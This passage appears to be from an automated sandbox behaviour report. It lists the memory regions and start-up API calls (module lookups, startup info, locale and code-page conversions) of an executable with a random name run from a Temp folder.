0x7ff5ffff4fff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffff4000" filename = "" Region: id = 1890 start_va = 0x7ff5ffffd000 end_va = 0x7ff5ffffefff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffffd000" filename = "" Region: id = 1891 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1934 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1936 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1937 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1938 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 1939 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1940 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1953 start_va = 0x180000 end_va = 0x23dfff entry_point = 0x180000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1954 start_va = 0x7ffaf2b90000 end_va = 0x7ffaf2c07fff entry_point = 0x7ffaf2b90000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 2019 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2020 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 2021 start_va = 0x250000 end_va = 0x256fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2022 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 2023 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 2024 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 2025 start_va = 0x4e0000 end_va = 0x667fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 2026 start_va = 0x670000 end_va = 0x7f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 2027 start_va = 0x800000 end_va = 0x1bfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 2028 start_va = 0x7ff5ffffb000 end_va = 0x7ff5ffffcfff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffffb000" filename = "" Region: id = 2029 start_va = 0x7ffadf0a0000 end_va = 0x7ffadf149fff entry_point = 0x7ffadf0a0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll") Region: id = 2030 start_va = 0x7ffaeb6f0000 end_va = 0x7ffaeb6f9fff entry_point = 0x7ffaeb6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2031 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2032 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2033 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2034 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2035 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2036 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2037 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2038 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2039 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2040 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2041 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2042 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2043 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2044 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2045 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2046 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2047 start_va = 0x7ffaf7930000 end_va = 0x7ffaf7a07fff entry_point = 0x7ffaf7930000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 2074 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 5200 start_va = 0x1c00000 end_va = 0x1cfffff entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 5201 start_va = 0x1d00000 end_va = 0x1e10fff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 5202 start_va = 0x7ff5ffff9000 end_va = 0x7ff5ffffafff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffff9000" filename = "" Thread: id = 154 os_tid = 0xb2c [0221.399] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffaf70d0000 [0221.399] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName=0x1400212e0) returned 0x7ffaf70f02a0 [0221.400] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlsFree") returned 0x7ffaf70f23f0 [0221.400] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlsGetValue") returned 0x7ffaf70e63c0 [0221.400] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlsSetValue") returned 0x7ffaf70ed920 [0221.400] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffaf70f5620 [0221.400] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateEventExW") returned 0x7ffaf70f5580 [0221.400] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateSemaphoreExW") returned 0x7ffaf70f55e0 [0221.400] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetThreadStackGuarantee") returned 0x7ffaf70f0e10 [0221.400] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateThreadpoolTimer") returned 0x7ffaf70ef110 [0221.400] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetThreadpoolTimer") returned 0x7ffaf7a4cb10 [0221.407] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7ffaf7a55790 [0221.407] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CloseThreadpoolTimer") returned 0x7ffaf7a4ea10 [0221.407] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateThreadpoolWait") returned 0x7ffaf70f28c0 [0221.407] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetThreadpoolWait") returned 0x7ffaf7a4c470 [0221.408] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CloseThreadpoolWait") returned 0x7ffaf7a55410 [0221.408] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlushProcessWriteBuffers") returned 0x7ffaf7aa42f0 [0221.408] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7ffaf7a895e0 [0221.408] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetCurrentProcessorNumber") returned 0x7ffaf7aa3130 [0221.408] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetLogicalProcessorInformation") returned 0x7ffaf70f0fb0 [0221.408] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateSymbolicLinkW") returned 0x7ffaf7112720 [0221.409] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetDefaultDllDirectories") returned 0x7ffaf4f0e7a0 [0221.409] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="EnumSystemLocalesEx") returned 0x7ffaf71128e0 [0221.409] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CompareStringEx") returned 0x7ffaf70e6010 [0221.409] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetDateFormatEx") returned 0x7ffaf7112a00 [0221.409] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetLocaleInfoEx") returned 0x7ffaf70f0310 [0221.409] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetTimeFormatEx") returned 0x7ffaf7112bc0 [0221.409] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetUserDefaultLocaleName") returned 0x7ffaf70f25d0 [0221.409] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="IsValidLocaleName") returned 0x7ffaf7112cd0 [0221.409] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="LCMapStringEx") returned 0x7ffaf70e6000 [0221.409] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetCurrentPackageId") returned 0x7ffaf4ea45e0 [0221.409] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetTickCount64") returned 0x7ffaf70e65a0 [0221.409] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0221.409] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0221.412] GetCurrentThreadId () returned 0xb2c [0221.413] GetStartupInfoW (in: lpStartupInfo=0x14fe90 | out: lpStartupInfo=0x14fe90*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x14000c2d0, hStdError=0x2f00c0)) [0221.413] GetStdHandle (nStdHandle=0xfffffff6) returned 0x8 [0221.413] GetFileType (hFile=0x8) returned 0x2 [0221.413] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0221.413] GetFileType (hFile=0xc) returned 0x3 [0221.413] GetStdHandle (nStdHandle=0xfffffff4) returned 0x10 [0221.413] GetFileType (hFile=0x10) returned 0x2 [0221.413] GetCommandLineW () returned="vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner" [0221.413] GetEnvironmentStringsW () returned 0x2f8400* [0221.413] FreeEnvironmentStringsW (penv=0x2f8400) returned 1 [0221.413] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14002c980, nSize=0x104 | out: lpFilename="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe")) returned 0x33 [0221.414] GetLastError () returned 0x0 [0221.414] SetLastError (dwErrCode=0x0) [0221.414] GetLastError () returned 0x0 [0221.414] SetLastError (dwErrCode=0x0) [0221.414] GetLastError () returned 0x0 [0221.427] SetLastError (dwErrCode=0x0) [0221.427] GetACP () returned 0x4e4 [0221.427] GetLastError () returned 0x0 [0221.427] SetLastError (dwErrCode=0x0) [0221.427] IsValidCodePage (CodePage=0x4e4) returned 1 [0221.427] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fe00 | out: lpCPInfo=0x14fe00) returned 1 [0221.429] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f8a0 | out: lpCPInfo=0x14f8a0) returned 1 [0221.429] GetLastError () returned 0x0 [0221.429] SetLastError (dwErrCode=0x0) [0221.429] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0221.429] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x14f5a0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿୈ䰥롅") returned 256 [0221.429] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿୈ䰥롅", cchSrc=256, lpCharType=0x14fbc0 | out: lpCharType=0x14fbc0) returned 1 [0221.429] GetLastError () returned 0x0 [0221.429] SetLastError (dwErrCode=0x0) [0221.429] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0221.429] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x14f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0221.429] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0221.429] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0221.430] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f9c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0221.430] GetLastError () returned 0x0 [0221.430] SetLastError (dwErrCode=0x0) [0221.430] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0221.430] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x14f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0221.430] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0221.430] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0221.430] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14fac0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f 